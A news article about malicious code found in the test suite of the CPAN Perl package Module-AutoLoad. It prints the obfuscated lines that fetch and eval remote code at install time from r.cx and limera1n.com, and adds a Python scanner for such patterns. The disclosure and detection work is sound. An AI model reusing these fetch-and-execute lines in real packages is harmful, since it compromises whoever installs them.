Malicious code found in Module-AutoLoad Perl package

Malicious code has been identified in the Perl package Module-AutoLoad, distributed through the CPAN catalog and designed to load CPAN modules automatically on the fly. The malicious insert was found in the test file 05_rcx.t, which has shipped with the package since 2011.
Notably, questions about the dubious download code were already being raised on Stack Overflow in 2016.

The malicious activity amounts to an attempt to download and execute code from a third-party server (http://r.cx:1/) while running the test suite, which is launched when the module is installed. It is assumed that the code originally downloaded from the external server was not malicious, but the request is now redirected to the domain ww.limera1n.com, which serves its own code for execution.

The download is initiated from 05_rcx.t by the following code:

my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

This code runs the script ../contrib/RCX.pl, whose content consists of the single line:

use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};

This script loads code obfuscated with the perlobfuscator.com service from the external host r.cx (the bare dotted literal 82.46.99.88 is not an IP address: Perl treats it as a sequence of character codes, which spell the text "R.cX") and executes it in an eval block.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1"; print<$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

After unpacking, the following code is executed:

print{$b=new IO::Socket::INET"ww.limera1n.com:80"}"GET /iJailBreak
";eval<$b>or return warn$@while$b;1
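The mechanism described above is easy to miss in a review because the test directory is rarely read, yet tests run at install time. The scanner below is an added example, not code from the Module-AutoLoad package or from opennet.ru; it runs over constructed samples that mirror the two files described in the article plus a benign module file, and it flags the four patterns the article shows (eval of data read from a socket, an outbound IO::Socket::INET connection in package code, a test shelling out to another perl script via $^X, and eval of a uuencoded payload). It also decodes bare dotted literals after IO::Socket::INET, since Perl parses a literal with two or more dots as a v-string of character codes rather than as an IP address, which is how 82.46.99.88 becomes the host "R.cX". The file names and contents in SAMPLE_FILES are constructed for the example.

```python
import re

# Constructed samples (not the real package contents) mirroring the two
# files the article describes, plus a benign module file for contrast.
SAMPLE_FILES = {
    "t/05_rcx.t": r'''my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
''',
    "contrib/RCX.pl": r'''use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};
''',
    "lib/Module/AutoLoad.pm": r'''package Module::AutoLoad;
use strict;
sub import { return 1 }
1;
''',
}

# Each rule: (id, pattern, explanation). The patterns are deliberately loose;
# a hit is a reason to read the file, not proof of malice.
RULES = [
    ("socket-eval", re.compile(r'eval\s*<\s*\$\w+\s*>'),
     "eval() of data read straight from a filehandle"),
    ("net-socket", re.compile(r'IO::Socket::INET'),
     "outbound network socket opened from package code"),
    ("exec-perl", re.compile(r'`\s*\$\^X\b'),
     "shells out to another perl script via $^X"),
    ("eval-unpack", re.compile(r'eval\s+unpack\s+u\s*=>'),
     "eval() of a uuencoded payload"),
]

# A bare dotted literal with two or more dots right after IO::Socket::INET.
# Perl parses such a literal as a v-string (a sequence of character codes),
# so what looks like an IP address is really a hostname.
VSTRING_HOST = re.compile(r'IO::Socket::INET\s+(\d+(?:\.\d+){2,})')


def decode_vstring(literal):
    """Turn a Perl v-string literal such as 82.46.99.88 into its text."""
    return "".join(chr(int(part)) for part in literal.split("."))


def scan_source(path, text):
    """Return (path, line_no, rule_id, explanation) tuples for one file."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for rule_id, pattern, why in RULES:
            if pattern.search(line):
                findings.append((path, line_no, rule_id, why))
        match = VSTRING_HOST.search(line)
        if match:
            host = decode_vstring(match.group(1))
            findings.append((path, line_no, "vstring-host",
                             f"bare literal {match.group(1)} decodes to host {host!r}"))
    return findings


def scan_dist(files):
    """Scan every file of an unpacked distribution, test code included."""
    findings = []
    for path in sorted(files):
        findings.extend(scan_source(path, files[path]))
    return findings


if __name__ == "__main__":
    for path, line_no, rule_id, why in scan_dist(SAMPLE_FILES):
        print(f"{path}:{line_no}: [{rule_id}] {why}")
```

On the samples, the benign module file produces no findings, t/05_rcx.t is flagged for executing another perl script, and contrib/RCX.pl is flagged three times (socket, eval of socket data, and the decoded host). The useful lesson is the scope: the scanner walks t/ and contrib/ with the same rules as lib/, because anything under t/ executes on the installing machine during `make test`.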

The problematic package has now been removed from the PAUSE repository (Perl Authors Upload Server) and the module author's account has been disabled. However, the module remains available in the MetaCPAN archive and can be installed directly from MetaCPAN with some utilities, such as cpanminus. It is noted that the package was not widely distributed.

Interestingly, the author of the module also joined the discussion. He denied the claim that the malicious code had been substituted after his site "r.cx" was hacked, and explained that he was just having fun: he used perlobfuscator.com not to hide anything, but to reduce the size of the code and make it easier to copy through the clipboard. The choice of the function name "botstrap" is explained by the fact that the word "sounds like a bot and is shorter than bootstrap". The author also assured that the identified manipulations perform no malicious actions and only demonstrate loading and executing code over TCP.

Source: opennet.ru